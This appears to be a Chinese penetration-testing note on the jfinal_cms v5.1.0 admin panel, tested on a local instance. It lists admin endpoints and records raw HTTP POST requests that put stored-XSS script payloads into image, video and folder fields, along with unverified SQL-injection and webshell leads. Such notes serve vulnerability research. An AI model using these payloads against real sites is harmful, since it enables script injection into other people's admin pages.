jfinal_cms-v5.1.0 admin 黑盒

jfinal_cms-v5.1.0 admin 黑盒 00x1 接口收集admin/advicefeedback/list admin/article/list admin/article/list_approve admin/comment/list admin/contact/list admin/filemanager/list admin/folder/add/ admin/folder/delete/ admin/folder/edit/ admin/folder/list admin/folder/view/ admin/foldernotice/list admin/folderrollpicture/list admin/friendlylink/list admin/home admin/image/list admin/imagealbum/list admin/imageshow/list admin/logout admin/operation admin/pageview admin/person admin/person/site/ admin/site/list admin/video/list admin/videoalbum/list system/config system/department system/dict system/log/list system/menu system/role system/user访问结果00x2 未授权越权他的鉴权做得非常好所以基本不需要测试授权了之后测试00x3 内容管理0x1 SQL可能存在,未验证修改/jfinal_cms/admin/folder/edit/259删除/jfinal_cms/admin/folder/delete/257/jfinal_cms/admin/folder/view/257查看添加admin xss?)POST /jfinal_cms/admin/folder/save/0 HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:149.0) Gecko/20100101 Firefox/149.0 Accept: text/html,application/xhtmlxml,application/xml;q0.9,*/*;q0.8 Accept-Language: zh-CN,zh;q0.9,zh-TW;q0.8,zh-HK;q0.7,en-US;q0.6,en;q0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 281 Origin: http://localhost:8080 Connection: keep-alive Referer: http://localhost:8080/jfinal_cms/admin/folder/add/0 Cookie: JSESSIONIDE1AD78FB934D8DFADE48FF96F73D472A; Hm_lvt_1040d081eea13b44d84a4af639640d511774432118,1774498388,1774610423; Hm_lpvt_1040d081eea13b44d84a4af639640d511774682483; HMACCOUNTA2CF3FA6A7F759C5; session_userVrhFVJS2SgewvZrFcwCawA Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: iframe Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Priority: u4 model.idmodel.parent_id0model.name111model.material_type102model.key1112model.path1111111111111111111111111111111111111model.sort10model.status1model.type1model.jump_url123456model.content123model.seo_title1233model.seo_keywords1model.seo_description12440x2 xss验证成功名称xss破坏页面Domvar 
oper; jQuery(function($) { // 页面方法 oper { width : 750, height : 550, form : document.form1, list : function() { var url admin/folder/list; this.form.action url; this.form.submit(); }, view : function(id) { var url admin/folder/view/id; var title 查看目录; Iframe(url, this.width, this.height, title, false, false, false, EmptyFunc); }, add : function(id) { id id||0; var url admin/folder/add/id; var title 添加目录; Iframe(url, this.width, this.height, title); }, edit : function(id) { var url admin/folder/edit/id; var title 修改目录; Iframe(url, this.width, this.height, title); }, del : function(id) { var url admin/folder/delete/id; var title 确认要删除该目录信息; Confirm(title, function() { form1.action url; form1.submit(); }); } }; //显示Menu索引 showMenu(page_folder); }); //分页 var paginator function(page) { oper.list(); }; var zTree; var demoIframe; var newCount0; function addHoverDom(treeId, treeNode) { var sObj $(# treeNode.tId _span); if (treeNode.editNameFlag || $(#addBtn_treeNode.tId).length0) return; var addStr span classbutton add idaddBtn_ treeNode.tId /span; addStr span classbutton edit ideditBtn_ treeNode.tId /span; addStr span classbutton remove idremoveBtn_ treeNode.tId titleadd node onfocusthis.blur();/span; sObj.after(addStr); var addBtn $(#addBtn_treeNode.tId); if (addBtn) addBtn.bind(click, function(){ oper.add(treeNode.id); return false; }); var editBtn $(#editBtn_treeNode.tId); if (editBtn) editBtn.bind(click, function(){ oper.edit(treeNode.id); return false; }); var delBtn $(#removeBtn_treeNode.tId); if (delBtn) delBtn.bind(click, function(){ oper.del(treeNode.id); return false; }); }; function removeHoverDom(treeId, treeNode) { $(#addBtn_treeNode.tId).unbind().remove(); $(#removeBtn_treeNode.tId).unbind().remove(); $(#editBtn_treeNode.tId).unbind().remove(); }; var setting { check: { enable: false }, view: { addHoverDom: addHoverDom, removeHoverDom: removeHoverDom, dblClickExpand: false, showLine: true, selectedMulti: false }, data: { simpleData: { enable:true, idKey: id, 
pIdKey: pId, rootPId: } }, callback: { beforeClick: function(treeId, treeNode) { var zTree $.fn.zTree.getZTreeObj(tree); if (treeNode.isParent) { zTree.expandNode(treeNode); return false; } else { // demoIframe.attr(src,treeNode.file .html); return true; } } } }; var zNodes [ {id:268, pId:257, name:111, open:true} , {id:269, pId:0, name:111, open:true} , {id:270, pId:257, name:scriptalert(11) , open:true} , {id:257, pId:0, name:jfinal-cms, open:true} , {id:258, pId:0, name:jfinal, open:true} , {id:259, pId:0, name:beetl, open:true} , {id:260, pId:0, name:mysql, open:true} , {id:261, pId:0, name:其他, open:true} , {id:262, pId:261, name:博客站点, open:true} , {id:263, pId:261, name:资讯站点, open:true} , {id:264, pId:261, name:论坛站点, open:true} , {id:265, pId:261, name:网站站点, open:true} , {id:267, pId:261, name:标签查询, open:true} , {id:266, pId:261, name:意见反馈, open:true} ]; $(document).ready(function(){ var t $(#tree); t $.fn.zTree.init(t, setting, zNodes); demoIframe $(#testIframe); demoIframe.bind(load, loadReady); var zTree $.fn.zTree.getZTreeObj(tree); // zTree.selectNode(zTree.getNodeByParam(id, 101)); }); function loadReady() { var bodyH demoIframe.contents().find(body).get(0).scrollHeight, htmlH demoIframe.contents().find(html).get(0).scrollHeight, maxH Math.max(bodyH, htmlH), minH Math.min(bodyH, htmlH), h demoIframe.height() maxH ? 
minH:maxH ; if (h 530) h 530; }接可以xss这个影响渲染00x4 素材管理00x1图片管理http://localhost:8080/jfinal_cms/admin/imageshow/edit/10x1 xss验证成功http://localhost:8080/jfinal_cms/admin/imageshow/edit/1POST /jfinal_cms/admin/image/save/2 HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:149.0) Gecko/20100101 Firefox/149.0 Accept: text/html,application/xhtmlxml,application/xml;q0.9,*/*;q0.8 Accept-Language: zh-CN,zh;q0.9,zh-TW;q0.8,zh-HK;q0.7,en-US;q0.6,en;q0.5 Accept-Encoding: gzip, deflate, br Content-Type: multipart/form-data; boundary----geckoformboundarya543911c825a9e3846f9eb5233f9f38c Content-Length: 1762 Origin: http://localhost:8080 Connection: keep-alive Referer: http://localhost:8080/jfinal_cms/admin/image/edit/2 Cookie: JSESSIONID24719248ADB2162EDF2DE03DB8133FDD; Hm_lvt_1040d081eea13b44d84a4af639640d511774432118,1774498388,1774610423; Hm_lpvt_1040d081eea13b44d84a4af639640d511774694150; HMACCOUNTA2CF3FA6A7F759C5; session_userVrhFVJS2SgewvZrFcwCawA Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: iframe Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Priority: u4 ------geckoformboundarya543911c825a9e3846f9eb5233f9f38c Content-Disposition: form-data; namemodel.id 2 ------geckoformboundarya543911c825a9e3846f9eb5233f9f38c Content-Disposition: form-data; namemodel.album_name 风景 ------geckoformboundarya543911c825a9e3846f9eb5233f9f38c Content-Disposition: form-data; namemodel.album_id 1 ------geckoformboundarya543911c825a9e3846f9eb5233f9f38c Content-Disposition: form-data; namemodel.name scriptalert(16)/script ------geckoformboundarya543911c825a9e3846f9eb5233f9f38c Content-Disposition: form-data; namemodel.image_net_url scriptalert(1)/script ------geckoformboundarya543911c825a9e3846f9eb5233f9f38c Content-Disposition: form-data; namemodel.image_url; filename Content-Type: application/octet-stream ------geckoformboundarya543911c825a9e3846f9eb5233f9f38c Content-Disposition: form-data; namemodel.sort 10 
------geckoformboundarya543911c825a9e3846f9eb5233f9f38c Content-Disposition: form-data; namemodel.status 1 ------geckoformboundarya543911c825a9e3846f9eb5233f9f38c Content-Disposition: form-data; namemodel.is_recommend 2 ------geckoformboundarya543911c825a9e3846f9eb5233f9f38c Content-Disposition: form-data; namemodel.publish_time scriptalert(666)/script ------geckoformboundarya543911c825a9e3846f9eb5233f9f38c Content-Disposition: form-data; namemodel.publish_user scriptalert(3)/script ------geckoformboundarya543911c825a9e3846f9eb5233f9f38c Content-Disposition: form-data; namemodel.remark scriptalert(12)/script ------geckoformboundarya543911c825a9e3846f9eb5233f9f38c Content-Disposition: form-data; nametags scriptalert(13)/script ------geckoformboundarya543911c825a9e3846f9eb5233f9f38c--如果查看0x2 木马(未验证0x3 注入未验证0x4 删除注入未验证00x2 我的相册0x1 xss失败转义了0x2 编辑大马未验证0x3 删除注入未验证00x3 相册管理(暂时报错00x4 视频专辑管理0x1 删除注入未验证0x2 xss成功专辑名称存在xss00x5 视频管理0x1 播放注入未验证0x2 xss未验证修改POST /jfinal_cms/admin/video/save/6 HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:149.0) Gecko/20100101 Firefox/149.0 Accept: text/html,application/xhtmlxml,application/xml;q0.9,*/*;q0.8 Accept-Language: zh-CN,zh;q0.9,zh-TW;q0.8,zh-HK;q0.7,en-US;q0.6,en;q0.5 Accept-Encoding: gzip, deflate, br Content-Type: multipart/form-data; boundary----geckoformboundarya14b721c65b07e62bfe6513c03cbca3b Content-Length: 2003 Origin: http://localhost:8080 Connection: keep-alive Referer: http://localhost:8080/jfinal_cms/admin/video/edit/6 Cookie: JSESSIONID24719248ADB2162EDF2DE03DB8133FDD; Hm_lvt_1040d081eea13b44d84a4af639640d511774432118,1774498388,1774610423; Hm_lpvt_1040d081eea13b44d84a4af639640d511774694150; HMACCOUNTA2CF3FA6A7F759C5; session_userVrhFVJS2SgewvZrFcwCawA Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: iframe Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Priority: u4 ------geckoformboundarya14b721c65b07e62bfe6513c03cbca3b Content-Disposition: form-data; namemodel.id 
6 ------geckoformboundarya14b721c65b07e62bfe6513c03cbca3b Content-Disposition: form-data; namemodel.album_name 动漫 ------geckoformboundarya14b721c65b07e62bfe6513c03cbca3b Content-Disposition: form-data; namemodel.album_id 4 ------geckoformboundarya14b721c65b07e62bfe6513c03cbca3b Content-Disposition: form-data; namemodel.name 娱乐5 ------geckoformboundarya14b721c65b07e62bfe6513c03cbca3b Content-Disposition: form-data; namemodel.video_net_url scriptalert(6662)/script ------geckoformboundarya14b721c65b07e62bfe6513c03cbca3b Content-Disposition: form-data; namemodel.video_url; filename Content-Type: application/octet-stream ------geckoformboundarya14b721c65b07e62bfe6513c03cbca3b Content-Disposition: form-data; namemodel.thumbnail scriptalert(6663)/script ------geckoformboundarya14b721c65b07e62bfe6513c03cbca3b Content-Disposition: form-data; namemodel.sort 9 ------geckoformboundarya14b721c65b07e62bfe6513c03cbca3b Content-Disposition: form-data; namemodel.status 1 ------geckoformboundarya14b721c65b07e62bfe6513c03cbca3b Content-Disposition: form-data; namemodel.is_comment 1 ------geckoformboundarya14b721c65b07e62bfe6513c03cbca3b Content-Disposition: form-data; namemodel.is_recommend 2 ------geckoformboundarya14b721c65b07e62bfe6513c03cbca3b Content-Disposition: form-data; namemodel.publish_time scriptalert(6666)/script ------geckoformboundarya14b721c65b07e62bfe6513c03cbca3b Content-Disposition: form-data; namemodel.publish_user 系统管理员 ------geckoformboundarya14b721c65b07e62bfe6513c03cbca3b Content-Disposition: form-data; namemodel.remark scriptalert(6664)/script ------geckoformboundarya14b721c65b07e62bfe6513c03cbca3b Content-Disposition: form-data; nametags scriptalert(6665)/script ------geckoformboundarya14b721c65b07e62bfe6513c03cbca3b--打开触发xss0x3 修改注入未验证0x4 大马未验证0x5 删除注入未验证00x5 首页0x1 ip xss未测试00x6 意见管理时间可不可控00x7 其他管理0x1 友情连接0x1 xss成功名称成功0x2 删除注入未验证0x2 联系人管理0x1 xss成功432 成功打开所有都有xss0x2 删除注入未验证00x8 模板管理0x1 大马未验证00x9 系统管理xss 后面不测试了一堆0x1 sql 
(未验证)
http://localhost:8080/jfinal_cms/system/department/delete/2
http://localhost:8080/jfinal_cms/system/user/delete/10
http://localhost:8080/jfinal_cms/system/role/delete/1
http://localhost:8080/jfinal_cms/system/menu/delete/21
http://localhost:8080/jfinal_cms/system/dict/delete/13
http://localhost:8080/jfinal_cms/system/config/delete/21
疑问：这个什么时候加的？